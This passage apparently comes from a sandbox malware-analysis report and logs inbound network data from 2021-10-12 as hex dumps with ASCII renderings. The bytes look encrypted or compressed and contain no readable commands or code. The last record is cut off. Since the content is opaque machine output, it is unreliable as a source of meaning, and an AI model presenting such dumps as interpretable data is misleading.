a2 29 5e Data Ascii: h3Q(voSw"`-[37?d^,&cB+L}"$5dTM!UUZ}_\~#Bn}y!1W.\|#2HeS09!H)XM!Tb4Sm4?6\|>fg2!)r"oSJvU?:]cg`c+y>K1V)^
2021-10-12 14:35:51 UTC	91	IN	Data Raw: 88 31 6f cd f2 b3 94 8d f3 2e ce e7 75 1c a7 a1 00 83 a1 a2 fa 18 e8 3e 1a b9 04 3c 39 79 18 de ca c6 d8 28 89 e4 02 7b dd a2 da b7 5b 10 25 39 aa 25 89 ce 67 bf 15 90 1f 91 9d 36 a3 37 68 0b 0e 80 22 81 46 96 96 a7 82 3a 83 b4 f3 28 0f 9f f4 f5 b3 a1 8e c5 d3 66 11 43 19 93 c9 4c b8 6a d9 19 64 04 6f 9a 6a 72 be 36 85 df b1 f5 05 af 68 db 70 82 8c cb f5 83 ff a1 cf dd a5 4d 07 1f 19 e5 eb 16 d0 b8 06 da 13 b5 49 b1 d2 63 f5 d1 94 8a 7f 1b 7e 6b ff ec d5 bc 83 8c 96 ca fb 00 e3 47 29 ad 71 a0 5c a8 6e 30 e2 c4 2c 78 80 0d 54 fe 0d a5 50 20 75 32 74 26 93 3e c6 41 b0 07 f8 3f a5 1f 05 ec 82 22 d7 2c 2c 01 b3 6b 92 d7 15 0b ce 99 ec 3d 13 ae 61 a8 43 41 db 00 c6 df 10 71 3e 28 fa 11 bc aa 9d 4b 39 63 41 a9 8d 31 1f 83 e7 1b c0 38 19 e5 6b 4b 5a 94 f9 52 82 Data Ascii: 1o.u><9y({[%9%g67h"F:(fCLjdojr6hpMIc~kG)q\n0,xTP u2t&>A?",,k=aCAq>(K9cA18kKZR
2021-10-12 14:35:51 UTC	92	IN	Data Raw: e9 c4 9f 7f db a3 e4 81 0d dc f2 30 27 3a da 07 89 72 44 79 eb 77 ff 13 e1 64 91 7a 9f 53 e0 14 c7 ee c5 e9 8b df 2b 0e ac d1 17 a3 4a 1b 5e 1e 2c d0 66 d4 95 72 f4 ea 92 2b c6 f4 5f 17 c5 5c 55 87 35 08 69 58 90 df 65 7c 19 af f0 b6 65 5e 29 d8 0a 04 01 ae 72 b8 1d f7 9f df 0c de 6a c4 5d 6e ba 34 29 de 6d 6e 1b 29 91 32 a8 a1 1c 7e a7 c4 35 d4 2b 76 3c 6d 22 e3 bf 26 84 a5 b8 b4 cb 3c f6 4c 18 52 52 40 3a 33 92 b6 cd 57 d7 77 a6 13 51 ee f4 d0 87 73 a3 d4 b9 5c 86 aa 98 3e 46 9c 2d 90 81 cd 10 e3 f2 35 f0 23 61 b3 a0 b7 b4 4b f2 d4 33 a5 e7 3f 73 28 74 6d 85 33 c4 a1 1e 31 8d d8 0d 9c 26 f3 3a 9c 63 bd ce a5 2e 25 d4 b2 9e 43 6e b4 67 4b e2 07 08 fa ae 94 82 52 a5 69 60 82 5d 9e 37 9c 35 4d 27 72 21 66 ad 6a ff 14 7c 9a 27 9c 1d 52 db 72 30 d4 9d 1d d8 Data Ascii: 0':rDywdzS+J^,fr+_\U5iXe\|e^)rj]n4)mn)2~5+v<m"&<LRR@:3WwQs\>F-5#aK3?s(tm31&:c.%CngKRi`]75M'r!fj\|'Rr0
2021-10-12 14:35:51 UTC	93	IN	Data Raw: 28 ce 54 a4 82 b2 15 7d c8 ea a6 9c 38 f2 2c c8 cc 79 36 33 a0 28 35 b3 ab dc 0a ef 2f 1c 36 54 e5 39 78 0f d1 91 1b d9 28 8d 7f b3 00 02 a3 c9 b4 25 85 0c 86 ae 27 f4 04 71 ac 02 94 96 fb 70 16 a3 32 07 63 1f 94 3a 4b 26 25 bf 90 84 29 80 b6 f0 03 cf 93 dc 9c a5 b7 9b f9 14 76 00 42 11 3c c9 4c be 5f dc 18 70 04 c1 9b 6a 7e 73 1c d3 d5 84 f5 03 b6 73 c3 7b b3 81 a4 dd 01 d7 72 dd ce a6 73 b9 13 97 54 da da d0 aa 3d ec 38 a1 52 62 c3 7c 63 fe 3c 99 6e 1e 7f bf 97 35 c4 b2 90 d4 32 d3 30 19 28 41 17 58 6b 95 e7 29 6e 30 e1 ae f5 6f 5a 1e 93 78 bc b6 5d 23 26 a4 76 26 9d 5b df 56 66 86 f8 3e b6 6c f0 ab 83 26 f1 73 30 68 ba 66 86 f5 ac 2b cc 9f fc a6 07 ab 75 ba 51 43 de 2f eb 68 07 a1 05 a2 e9 1e 9d 92 80 58 00 d2 d2 bf a5 00 83 82 f6 1c d0 23 9c ee 4c 89 Data Ascii: (T}8,y63(5/6T9x(%'qp2c:K&%)vB<L_pj~ss{rsT=8Rb\|c<n520(AXk)n0oZx]#&v&[Vf>l&s0hf+uQC/hX#L
2021-10-12 14:35:51 UTC	95	IN	Data Raw: cc 9c 6c 15 15 0e c2 9f 73 d5 9d 07 11 0c dc f9 0b 30 2a d6 18 c1 a6 46 79 e1 0b e7 0a 54 47 45 f7 be 45 f1 19 bb 04 c6 ed 90 b5 50 09 22 6c 16 ad 4d 3e 1f a2 2e d6 73 cb eb 1d e0 14 9b 0c f7 de 59 31 79 6c 57 81 2e 1d e9 34 46 b0 6c 55 02 a4 9f d6 14 08 21 d4 11 75 38 85 5b b8 1b 98 e0 ed 09 d4 88 d4 56 68 6b 3a 46 fb 79 7d 1b 7e 48 31 a8 ab 3a 44 8b ca 2c 02 5b 5a 2e 7a 0a e8 a7 25 bd 8e 35 03 e5 66 9b 4e 12 47 61 42 3b 35 92 b2 bc 9d d4 5b aa 57 30 f3 fd c9 ab 62 bc c9 70 45 76 ba ba 25 4e a4 6c b9 6d 34 07 c5 d1 2e fb 1a b0 aa 5e b0 f7 2d e1 d0 03 88 f7 34 62 3c 73 4f 39 20 ce be f6 bd a6 de 0e 8e 35 fd 3d be c0 ac c4 b0 11 ca d5 9e 9b 3d 0b a7 6e cf 73 29 27 d3 8a 97 9d 4c d9 0f 62 93 5d a7 2f 67 25 6a 42 b1 29 71 71 28 f9 0f 2d a5 24 98 2c e3 cd 8c Data Ascii: ls0*FyTGEEP"lM>.sY1ylW.4FlU!u8[Vhk:Fy}~H1:D,[Z.z%5fNGaB;5[W0bpEv%Nlm4.^-4b<sO9 5==ns)'Lb]/g%jB)qq(-$,
2021-10-12 14:35:51 UTC	96	IN	Data Raw: c6 56 da 36 e1 29 9a 50 b6 80 a0 15 6f cd fa 8d a3 94 f3 26 cc e3 03 d5 33 a0 04 86 9a 24 db 19 e3 12 11 1c 01 3e 39 7e 78 f5 e8 c7 d3 52 8d 7f 1b 73 d9 83 36 4f 4a 1b 3c 8d 80 0b 8d d8 77 df 51 83 0c 8a ea 14 a0 4b b7 0b 1d 90 32 91 13 e0 97 a7 80 03 8a a5 eb 30 dd 9b b1 f3 a5 b7 9d d1 c1 72 02 47 3d bb 7a 4d b8 7f cf 23 f8 2d f9 91 46 7f 85 11 f4 fd b5 86 25 be 60 c0 02 9d 84 8c 52 80 ff ad f5 c5 88 75 14 12 91 21 da ce c3 a7 6f d6 2f dc b9 bc c3 69 66 c2 b4 9c 46 66 69 bd ea 94 26 b2 94 5e af c4 ea 0e e1 62 1c 4b aa ad 28 29 6e 30 e3 d5 2b 47 4d 1a 82 79 24 b3 2d cd 5d 78 72 24 8f 37 39 41 b0 18 e9 31 c9 f2 2d ab 87 20 d9 40 c7 6e ab 6e 90 fd 7a 6f cd 99 67 00 00 ab 74 c6 a2 57 ca 03 4a 1b 74 a9 2d 34 94 fd 97 83 88 4e 53 8f d0 bf a7 14 61 ca f7 1c db Data Ascii: V6)Po&3$>9~xRs6OJ<wQK20rG=zM#-F%`Ru!o/ifFfi&^bK()n0+GMy$-]xr$79A1- @nnzogtWJt-4NSa
2021-10-12 14:35:51 UTC	97	IN	Data Raw: 8c ad 55 b8 10 cd 9a 7b 68 06 38 c0 95 0a b7 a5 68 f0 01 c1 e0 1d 3c 2a df 1a 04 25 6a 7a f9 1e f3 04 2a 76 5d 09 b5 7f ea 13 d3 96 2d ed 9a de 21 18 27 66 14 a5 42 cd 36 32 3b d1 50 2e 83 c0 e3 14 97 53 bd da 48 35 65 25 57 81 2e 01 fa 2a 83 da 64 45 07 b7 0e bd 3a 03 28 da 73 ca 11 ab 5e b3 07 e4 89 ef 18 db b5 3b 5c 42 70 33 2f b2 90 7d 11 15 38 20 ad a1 0d 6a b0 25 20 06 23 52 41 07 25 f5 bc 30 86 a5 36 12 e6 1f 09 4d 3e 4e 50 40 35 33 92 b9 cc a3 28 5a 8c 3a 77 f4 c5 ec 72 8c 4d f4 b8 54 63 9b b6 34 6c 9a 3a 46 5f cb 0f f9 f5 34 e4 38 68 a8 2a 21 98 41 e2 c3 0d bc e2 17 3e 37 67 6d 94 26 c4 94 e7 36 d5 49 0e 8f 20 c3 2a be 1d ae c4 b0 2f 41 de 40 9f 77 4e 92 6e c5 5f 35 04 c3 ae 94 97 94 b6 64 4a 93 56 91 21 62 34 61 0d 63 22 5a 7b 77 62 0b 6b 88 c7 Data Ascii: U{h8h<%jzv]-!'fB62;P.SH5e%W.dE:(s^;\Bp3/}8 j% #RA%06M>NP@53(Z:wrMTc4l:F_48h!A>7gm&6I */A@wNn_5dJV!b4ac"Z{wbk
2021-10-12 14:35:51 UTC	98	IN	Data Raw: 85 a7 7c fd 20 ae 27 14 7b f2 1d 4c 4d 72 ba d4 cb 56 10 2d 5c 75 6b ed 2c c1 43 44 67 48 82 1f 56 d9 6f c7 8d 0c 21 5b 06 7c ce 1f 5c 06 05 4f 02 6e 30 f1 f2 4a 1a df bd 58 47 1d f3 9e 04 30 01 04 6c 60 e3 df c7 ca 9a f6 64 09 23 70 2f 8e f5 81 92 56 ab b1 4d fe 74 c9 5c 1c da fa 75 58 2c 7f 49 ca ab ca 6d cd bb 37 1f 1a ca c0 ae 87 30 0a 2c 01 c4 0b ab d4 81 fd 5b 91 80 a5 3e 72 f6 f7 a4 fb 79 63 25 86 88 a3 a9 58 cd b6 7f 0c 76 3a c8 80 73 34 a6 44 f8 26 d9 cb 45 c3 c4 25 0a d0 37 76 7a e1 ac f6 04 3b a2 47 f7 a5 45 f3 11 ec 79 c6 ed 9a da 2b 0f 3e 98 04 8c 50 31 2e 18 5f 8f 75 d0 8e 7a ff 07 95 20 d0 dc 56 c1 17 74 5e 88 26 71 e8 22 90 db 7b 5d 11 aa f0 ad 12 15 d5 d9 2c 72 18 a8 4e 90 de f6 8c e9 04 c0 bd c1 5d 7f 7e 23 d7 ce 57 7e 09 02 20 33 b9 a5 Data Ascii: \| '{LMrV-\uk,CDgHVo![\|\On0JXG0l`d#p/VMt\uX,Im70,[>ryc%Xv:s4D&E%7vz;GEy+>P1._uz Vt^&q"{],rN]~#W~ 3
2021-10-12 14:35:51 UTC	99	IN	Data Raw: 38 c1 ec cb ea d4 a6 1f 54 15 27 95 84 a6 2a 6b 3c cb 39 b6 a4 bf 45 b9 95 f6 25 91 b5 02 13 76 26 72 c3 3d 93 55 db f2 6f de 47 16 61 8f bb fb 0e 9b 0b 20 24 89 c1 f4 70 8c 74 f2 66 0c ae d7 87 a2 19 a3 8f 36 4c db 4e bd ba 55 bc 2d 8e 46 0a c6 90 a9 fe 1b 16 2c fd c5 11 35 34 7d d1 12 0b 13 bd 07 dc 0c 03 e8 ba 14 30 72 7a 28 5f c2 93 b9 37 9c 60 1c b5 57 ea 08 d0 08 87 97 12 65 e9 70 33 28 ec 5f d7 e3 f2 c7 2b d3 ec 47 cc 19 f3 d7 dd 7c bf b8 9e ea 90 32 e7 b4 a7 91 f3 3d cb ea 72 ca 32 8c 08 8d a5 7d d6 06 e4 2d 1f 34 3e 39 24 86 0a ff fe d1 db 53 85 68 29 7f b2 29 cb b0 40 0c d7 95 ac 29 91 cb 74 ac 17 87 17 7e 91 3a a8 34 13 1b 1c 94 34 b9 b2 1c 84 a2 84 38 8f b3 06 01 f2 98 e3 e0 a0 b7 8c d4 de 65 fe 45 15 91 e3 49 80 90 37 f4 88 06 ea ab 6f 74 a8 Data Ascii: 8T'*k<9E%v&r=UoGa $ptf6LNU-F,54}0rz(_7`Wep3(_+G\|2=r2}-4>9$Sh))@)t~:448eEI7ot
2021-10-12 14:35:51 UTC	100	IN	Data Raw: 65 d9 ec 10 78 72 c9 fa f7 23 8c bf 3f 7b e3 01 60 57 51 ba dc d4 84 ee 2c 61 0c e0 e9 51 d8 4e 46 60 5f e7 d8 57 d1 73 15 80 24 24 33 0d ef ce 15 07 6c 01 90 13 6e 3f ac e4 49 d8 2b b4 58 48 12 9f b4 0b 31 0b dc 76 46 e3 d6 cc 34 9b d8 60 24 0a 71 00 8e f7 9f 6c 57 87 a0 7a e3 09 dc 5c 1c de 39 7c 54 3d 75 01 4f a4 e7 65 ba 75 0a 1f 1c c0 f4 a9 af 16 15 d2 06 9b 81 ae d6 f6 89 58 c1 eb 72 33 72 f8 ea 72 69 57 61 37 87 a0 38 bd a6 c6 96 74 65 e9 3a c0 95 51 0a a6 68 fc 1e d8 f5 77 a8 39 da 07 e9 22 6d 44 f3 0b de 91 39 73 4d e4 b1 50 f1 10 bb 7d c4 ed 90 f7 10 09 72 77 00 a8 33 f9 36 1e 2a fa 6b c1 80 67 e7 6f 88 21 c1 dc 40 2e 13 23 4f 80 24 08 f4 26 eb fb 65 54 06 c1 34 bd 16 0e 0d ca 06 56 87 a9 58 b2 30 4d 52 e1 1b d8 50 d3 7a 6e 7a 2f 46 98 7b 7d 1b Data Ascii: exr#?{`WQ,aQNF`_Ws$$3ln?I+XH1vF4`$qlWz\9\|T=uOeuXr3rriWa78te:Qhw9"mD9sMP}rw36*kgo!@.#O$&eT4VX0MRPznz/F{}
2021-10-12 14:35:51 UTC	102	IN	Data Raw: 87 88 ec 2d 62 39 c5 ea df 28 d4 a6 1d 6a 8d 5e 85 8f b0 34 8a 22 a4 90 bc bb a1 4b ac 90 e7 32 83 54 0d c1 74 12 6e c7 46 92 52 c7 08 57 ee a8 e1 9d eb ae e9 0b 9f 75 bd 3b 82 35 fe 41 8a 75 f0 0c 04 b0 c0 7d cc b3 b6 8d 47 4b 00 f6 6e a7 62 29 3c 8b 4c 0d db e0 16 00 1a 30 38 e7 c2 6a 3b 24 7b ca 07 e2 01 94 08 ce 72 38 17 bb 3c 00 f2 5e d7 a0 22 87 a3 22 99 71 0b ad b6 ff da c1 2c 8b ee 4d 6a e8 74 58 df 1b 5f dd e3 f3 c1 3e d6 fd 50 d6 12 1d 28 f0 4a b4 fb ae 14 6f c9 ff 2b 03 22 db b5 cc f5 74 22 2b cf a9 85 b2 a1 c5 0c fa 38 1a 25 29 23 35 86 0a ff e3 ff d6 29 89 69 36 76 ce a5 c9 a1 4c 04 18 78 a9 09 95 da 0a a2 07 82 08 89 1e a1 15 1e f1 09 1d 9e 26 8d 01 a9 97 a7 8e 36 9c b6 fe 00 cf 9d eb fc 5b b6 b1 cd c3 09 0e 45 39 97 cb 37 a1 78 ca 0f 5f b5 Data Ascii: -b9(j^4"K2TtnFRWu;5Au}GKnb)<L08j;${r8<^""q,MjtX_>P(Jo+"t"+8%)#5)i6vLx&6[E97x_
2021-10-12 14:35:51 UTC	103	IN	Data Raw: 30 cd 12 98 75 61 c2 e7 dd 7f 57 ac 2e e2 22 86 ac 19 64 ee 22 67 57 6f be c3 c0 a1 ef 00 76 54 46 f6 44 c1 46 44 72 53 97 09 a8 d0 59 2d 8e 5b 22 5d 78 eb c9 09 51 f5 bd 21 ab 6a 2b f7 ed 59 15 25 bc 65 4a 05 e6 1d 0a 1d 10 08 73 17 ec d6 dc 30 f4 42 60 22 00 67 3c 99 ee 9b 6c 46 83 a4 45 18 08 f7 4a 1e a5 eb 7d 54 28 61 79 ae a8 e6 6f a8 1a 59 b6 1c c1 d3 bd 97 2b 13 d2 11 ec 1d bb 28 fd df 61 93 ff b5 33 72 fa fe d7 d1 55 61 3c 87 81 bd a0 f6 50 93 6a 04 31 a6 c9 87 62 56 ae 71 e6 91 d5 e9 0e a0 32 c1 1b 66 2d 5a 6f 7d 04 eb 12 a7 7a 51 e9 db fa e0 15 de f4 de fe 9e da 2b 0f 3d 6c fb a1 70 1a 35 65 22 d7 75 d4 86 0d ee 15 91 24 ae 52 4a 3f 1c 32 57 fa 35 0d e5 27 46 f7 f9 56 02 a4 e6 a2 79 a1 2b d8 0a 61 1b b8 5c b8 0c f3 90 11 08 f2 b9 c7 26 60 7b 34 Data Ascii: 0uaW."d"gWovTFDFDrSY-["]xQ!j+Y%eJs0B`"g<lFEJ}T(ayoY+(a3rUa<Pj1bVq2f-Zo}zQ+=lp5e"u$RJ?2W5'FVy+a\&`{4
2021-10-12 14:35:51 UTC	104	IN	Data Raw: 28 90 78 b7 8a 8b 8a fe 5e 66 26 3b ef 9c ed d6 f6 60 5e 16 5c 81 86 f6 55 fe 8a a4 94 88 70 b5 58 aa 8f e9 27 9c aa 1d e5 69 f4 7c ed 4f bb c8 db f6 56 dd b1 fa 96 90 a5 e0 14 ba e4 24 17 92 3d 8e 52 98 73 f4 14 6d 31 d5 83 c7 80 83 9c 34 45 10 fe 75 ba b4 b1 12 9b 42 1d d5 89 31 b7 75 61 27 ff db 67 24 39 6e dd 0d 0d 08 a7 15 33 08 31 1c aa 3e 2e 9d 4c d1 bf 2e 9f b8 24 88 68 12 a6 b6 ff da c0 27 d8 ee 70 6a e8 74 29 07 8e a2 28 16 f2 c5 2b de ec 47 c1 11 1d 28 f0 53 ae 93 a8 15 7e c5 e1 5b b5 b8 f5 3a dd f0 64 27 3b a0 11 8d ad b2 24 18 c5 30 19 64 3e 39 57 05 10 d2 ea c3 c6 32 9a 61 29 6a d5 bc c3 4e 4b 37 01 85 f8 30 f2 f8 70 ac 02 9d 07 93 98 16 b2 3e 7e f5 1c b8 33 82 7d 08 97 b6 8c 36 ae 5b f9 2c dc b0 f1 cb 65 4b 62 2e eb 72 00 44 2a a3 cb 4c c4 Data Ascii: (x^f&;`^\UpX'i\|OV$=Rsm14EuB1ua'g$9n31>.L.$h'pjt)(+G(S~[:d';$0d>9W2a)jNK70p>~3}6[,eKb.rD*L
2021-10-12 14:35:51 UTC	105	IN	Data Raw: 47 5b 64 a8 aa 35 cd 1e 98 75 6d c2 e8 dd 7f 57 ae 58 e0 f5 8a b7 0e 68 f0 31 72 5f 61 b7 22 d5 73 fa 29 73 77 73 e5 87 fa 79 45 63 5d f5 08 57 d1 71 26 82 33 24 5c 69 e7 d9 e1 57 57 09 56 11 62 2b ec fa 5d 0f df bd 58 41 19 f8 fc 01 e7 29 8b 73 6c e9 da c3 3e 88 d2 60 33 02 73 33 70 fc b3 7d 52 fc a6 4b e6 0d ce 33 5c 89 1a 83 ab 33 66 42 3c aa f7 6d a1 14 c8 1e 30 d1 da aa 98 32 c1 fa 8b ea 02 a6 c5 f9 ec 4f 82 8c bb 23 7a e1 eb a4 fb 79 6d 34 95 90 ef 96 59 33 65 62 17 69 32 c0 8e 71 d3 59 69 d6 03 d8 f0 96 8b 21 00 1a 20 37 41 75 fb 1e fe 04 2a 7b 58 e4 4a 52 cc 1a d7 e3 d8 3b b2 51 38 0b 28 75 03 bf 48 20 3f 1e 3d de 6a cb 7a 77 ce 1d 99 31 c6 e9 20 20 0a 4b 5d 81 35 04 fa 2c 6e de 48 40 07 ad f8 a3 02 de 03 e3 01 7e 1a d6 44 b9 1d f3 93 ff 1a d6 ae Data Ascii: G[d5umWXh1r_a"s)swsyEc]Wq&3$\iWWVb+]XA)sl>`3s3p}RK3\3fB<m02O#zym4Y3ebi2qYi! 7Au*{XJR;Q8(uH ?=jzw1 K]5,nH@~D
2021-10-12 14:35:51 UTC	107	IN	Data Raw: 28 b8 66 f9 b3 0c ca 76 a7 88 85 06 17 56 79 39 ed dd b1 fa df a4 60 4c 16 5c 81 ea 3d 2c e5 81 28 01 b6 a4 b4 4e 82 0c f7 34 9e 86 08 fb 7d d4 0e c3 57 8b 29 ca f7 56 c6 ba f8 9a 87 de 32 bc 8c cc a8 10 82 3f f4 21 89 72 f0 19 00 d4 d9 82 cd 9b a8 99 53 d5 03 f6 60 97 48 cb 30 8a 46 1f c1 f4 af 01 1a 3e 31 ee d5 db 54 6e 7d d5 07 3a 02 c3 09 cc 09 19 1f ad 57 a9 48 5f dd 86 2a 86 6e 06 9b 1b 03 b1 48 fa 99 57 26 88 9f 7f 01 d5 18 c9 b8 e4 81 db c1 da d2 38 dc c4 6e c9 06 e9 f7 dc 46 9c 86 8a 54 73 cd f8 a5 b4 94 f3 3e ce f5 7e 82 32 a0 00 4d b3 ab da 15 e9 3e 1a 2e 2f 3c 38 6b 3b d1 ea ef d9 28 89 61 29 7b cc b5 c2 9b 51 1b 0a 91 56 24 a3 da 69 a7 06 85 1a 7e 91 3a a1 21 63 0b 1a 8c ce 94 42 02 bc a5 af ca 88 de e2 01 de 9f de 89 a7 9f 8a d1 c1 78 02 5b Data Ascii: (fvVy9`L\=,(N4}W)V2?!rS`H0F>1Tn}:WH_*nHW&8nFTs>~2M>./<8k;(a){QV$i~:!cBx[
2021-10-12 14:35:51 UTC	108	IN	Data Raw: e3 5b c4 ee 75 ef 51 77 a6 b2 28 f6 fa 9c 64 63 cb 7f 24 7e 7b a7 44 e3 37 91 80 b2 7b f8 3b 45 7c 24 bd c8 fc b2 ea 2c 76 69 e1 ee 51 d2 43 50 77 43 a0 b0 56 d1 7f 2d a4 ce 28 5c 7e f9 43 18 56 7b 0b 5a 16 7e 03 5e f2 42 0c 09 ad 74 4e 10 fc eb 1f 19 ee 04 71 6a f4 5a db 34 9b db 73 26 1b 68 35 a6 0d 9b 6c 51 25 aa 4e f2 1d cf 75 bf de e5 76 7c 99 77 51 3e 86 e4 4e 86 07 22 37 f1 c5 d9 a4 91 b5 10 d2 00 e9 16 b8 c2 d4 50 5a 91 8e af 1a 83 fa e0 5c ec d8 66 3d 8a 89 bf ab b2 e4 39 7d 1b 70 12 74 9f 79 c0 8f dd fa 0d d6 c9 76 c3 c4 25 0a ee 0c b4 7d e1 0b e0 89 3c 73 47 f6 a0 47 f4 3d 77 eb c6 e7 b2 80 3a 0b 28 6c db b0 79 1b 00 1e 2c dc 78 c6 8e 5e da 14 91 2a 1f d8 4e 15 16 58 55 c0 38 0c e5 23 90 df 64 54 02 ae f0 4f 17 08 2b 2b 01 7e 10 bb 58 b8 1d ed Data Ascii: [uQw(dc$~{D7{;E\|$,viQCPwCV-(\~CV{Z~^BtNqjZ4s&h5lQ%Nuv\|wQ>N"7PZ\f=9}ptyv%}<sGG=w:(ly,x^*NXU8#dTO++~X
2021-10-12 14:35:51 UTC	109	IN	Data Raw: e3 8f a3 a2 cd 2f d7 c3 f0 6d 2c d6 76 cd 5e 83 8a e5 6c 00 c7 3a 11 6e ec c4 b7 6e 79 17 5c 84 a9 aa 3f f4 fe 9f 90 b6 a5 da 0f aa 90 fc e8 bc 5f 08 ed 71 20 7a eb 46 83 54 9a 92 56 c2 ba e9 9e 90 99 e8 0b 9b 11 25 3b 82 07 f5 5c 99 7f f0 1d 02 af d7 83 cd 9d a1 8f 3c 01 01 f6 6a 9b 4b b0 3e e5 47 1b c3 99 bf 00 1a 3a 27 ff d1 6e 3b 35 7d 5e 0c 1c 00 a0 07 cd 09 be 17 bb 38 35 4a 5f d7 a0 3d 8c b0 26 99 60 0d 09 49 fe f6 4b 24 88 95 3a 69 e8 70 21 47 1b 5f d7 e9 ed d2 23 e6 e5 56 3c 04 e3 29 30 50 b6 91 be 98 44 cd f8 a4 a7 9d 80 87 ce f5 74 27 35 b1 06 91 9a 2f d8 19 ef 29 97 33 2f 3c 38 6b 05 c2 e4 d1 c8 21 2b 78 27 68 d2 b2 c6 a4 5e 0c 80 a9 a8 25 8e cb 61 bd 16 94 1b 1c 81 06 b4 1e cf 0b 1d 9e 16 84 7e 16 07 8b 9b 38 85 b3 62 28 cf 9b f4 f9 75 a5 9d Data Ascii: /m,v^l:nny\?_q zFTV%;\<jK>G:'n;5}^85J_=&`IK$:ip!G_#V<)0PDt'5/)3/<8k!+x'h^%a~8b(u
2021-10-12 14:35:51 UTC	111	IN	Data Raw: fa 1d 4c f7 61 f7 70 85 f9 51 47 51 77 ac b5 3c de 16 ff 03 65 c8 e8 23 7e 7a bd 60 f4 23 2a a8 15 7b 16 31 63 46 56 bd d9 d4 59 9d 97 72 7f 66 e5 59 bd fe 46 63 5d 85 6d c5 d1 75 33 87 29 43 3f 78 ef c4 0c 50 50 52 5f 04 05 4f fd f2 48 72 63 bc 74 4f 09 f4 e4 75 a2 01 00 7b 03 fa d6 dc 3e b7 f6 71 26 22 64 26 8e fb f0 ac 55 87 b1 62 53 09 db 57 30 cc f4 78 7c 25 72 51 32 c5 26 67 be 0a 59 0a 1c c1 d3 a9 96 3c 78 13 02 e8 08 ab fe 19 f0 5a 97 fa 28 32 72 f4 8f 22 fa 55 6b 36 9b 8e c4 d9 a6 cc 90 50 84 a4 36 d1 99 55 cd b6 6e 95 5a dc f3 12 e0 3c d0 d3 ef 01 6e 4e e1 0d fc 17 3e 5b 4d f2 b4 55 ea 3d ec eb c6 e7 44 da 3c 21 23 7a 05 a0 5e 33 2f 1e 41 53 75 dc 84 76 e2 14 91 20 c1 d8 dd aa 16 4d 4f 81 24 0d fe 13 98 df de 54 02 ae 1f bc 16 19 03 d3 05 7e 16 Data Ascii: LapQGQw<e#~z`#*{1cFVYrfYFc]mu3)C?xPPR_OHrctOu{>q&"d&UbSW0x\|%rQ2&gY<xZ(2r"Uk6P6UnZ<nN>[MU=D<!#z^3/ASuv MO$T~
2021-10-12 14:35:51 UTC	112	IN	Data Raw: f8 29 6c de 28 8d 7b a8 8a ec 07 c0 c8 fb b9 2e 90 65 a2 9f ab a4 ed 56 7f 57 bd ee b0 f0 d8 a4 1d 2d dd 5e 85 8f b9 22 ff 9c cb 64 b7 a4 b3 4e 82 81 f7 34 9e a6 0b c5 66 0f 7d c7 29 9a 55 db fc 6f 75 b9 e9 9e b8 a6 ed 0b 9d 17 2c 13 91 3a f5 5a f6 6a f1 1d 08 83 db 8a e5 8b a4 8f 3a 6d 25 f6 6a bb 47 b2 38 e4 8c 19 c3 85 a0 38 00 2c 48 0b d0 6c 3d 1d 6a d4 0d 16 28 ef 05 cd 0f 35 38 b9 38 3f 25 27 d7 a0 37 a4 85 26 99 6a 1e b7 5f ed fe e9 75 89 95 69 7a ef 72 4c 70 1a 5f d3 86 26 d0 38 dc 36 4e 11 11 39 3e 0a dd a3 80 a0 14 7c c4 ee b4 b3 96 88 1b cf f5 7a 5b f8 a2 00 8f 68 b3 02 0e 33 2d 0b 27 25 17 01 69 02 c2 e0 c5 df 47 43 6b 29 71 d5 b2 c1 68 52 cd 1c 8c b0 fd 59 c0 66 c3 f2 83 0c 86 b8 01 a2 36 62 23 4a 96 30 93 46 2e 95 a7 82 46 f2 a5 f8 0a 7c 8a Data Ascii: )l({.eVW-^"dN4f})Uou,:Zj:m%jG88,Hl=j(588?%'7&j_uizrLp_&86N9>\|z[h3-'%iGCk)qhRYf6b#J0F.F\|
2021-10-12 14:35:51 UTC	113	IN	Data Raw: e2 66 08 dc 4d eb 1a 4d 79 ce fe 57 04 23 32 bc 50 77 aa aa 37 cd 1d 98 75 6e c2 ef dd 7f 57 b6 41 f1 20 8f bf c3 ea 97 ca 62 57 78 a5 c2 c7 54 ee 3d 7b 60 60 17 50 fe 4b 7c c3 a9 77 ec 49 dc 66 32 8c 31 27 43 66 11 cf 33 47 7c 65 b2 03 6a 2d ec f4 2d d4 23 bc 7e 51 05 e3 e8 0b 20 0a 1c 8f 6d cf df df 3d 0a c9 6a 3f 19 67 23 9f f6 88 92 56 ab b8 52 f5 02 db 4c 17 c1 fa 82 55 00 64 52 3d bd 30 f4 a9 da 21 c9 91 ea d9 a2 86 34 08 f2 13 e3 02 bd dd e3 de a4 90 a8 a8 31 7b e9 36 cb ed 8f 76 eb 07 a3 ab bf a7 c0 85 53 08 71 3a d1 94 66 d1 59 69 d6 06 af f3 1a 3c 3d c9 0b e5 38 55 72 e1 1c fd 1b 0e 8d 46 db bd 6b 66 14 d4 eb d9 db 89 d1 3a 1a 29 79 20 5e 5d 1f 15 19 43 2a 74 d0 82 71 8d e8 90 20 c7 b7 98 3d 16 52 42 5b 4b dd e7 23 9a d7 0b ab 03 ae f6 a3 30 1b Data Ascii: fMMyW#2Pw7unWA bWxT={``PK\|wIf21'Cf3G\|ej--#~Q m=j?g#VRLUdR=0!41{6vSq:fYi<=8UrFkf:)y ^]C*tq =RB[K#0
2021-10-12 14:35:51 UTC	114	IN	Data Raw: 79 9e 53 e9 ed 68 4d c1 df c8 ad 04 df 27 87 a6 bd ef 4b 6d d0 6c 9f 01 e2 68 bd ea ee ab 4e 95 5a 83 ab 3a 0c f2 58 0f 91 0f 7c 2a 29 64 5f 19 d4 29 69 8c 17 9d 54 35 ae 50 30 56 67 5a d8 98 66 c5 46 df e0 ea 32 b2 06 2a c4 51 20 dd 37 3e 43 b8 61 92 cc 71 30 ed 67 eb 07 0d a8 fb 0c 4c 4f 1c dd 5b 6c 18 89 3e 35 e9 0f 9c 9c b6 b2 29 40 c1 b8 cc ea 0f 85 f0 0d d9 58 5a f8 64 20 6d 45 eb 59 88 ef e5 49 e8 92 f7 f1 68 f2 93 f9 e4 7d e8 59 c1 f2 5d 56 5a 68 bb 4b 3d f2 00 9f 0b 99 dc f2 25 7c 73 c9 a7 f6 23 80 c7 c7 79 f8 3b 7c 4f 6d b1 dc c5 54 f1 6c 8e 7e 40 f8 52 db 5a 92 6b 41 99 17 7e c7 74 39 86 3f 6d 4f 73 ef df 14 49 42 f4 4f 2e 7a 3a f5 f1 4b 11 f7 2d 1b b5 1b f0 e5 14 0b 12 0b 71 7d e8 c8 ee ca 9a f6 71 21 03 74 f5 86 eb 8e 68 7f 91 ba 4a ec 16 e8 Data Ascii: 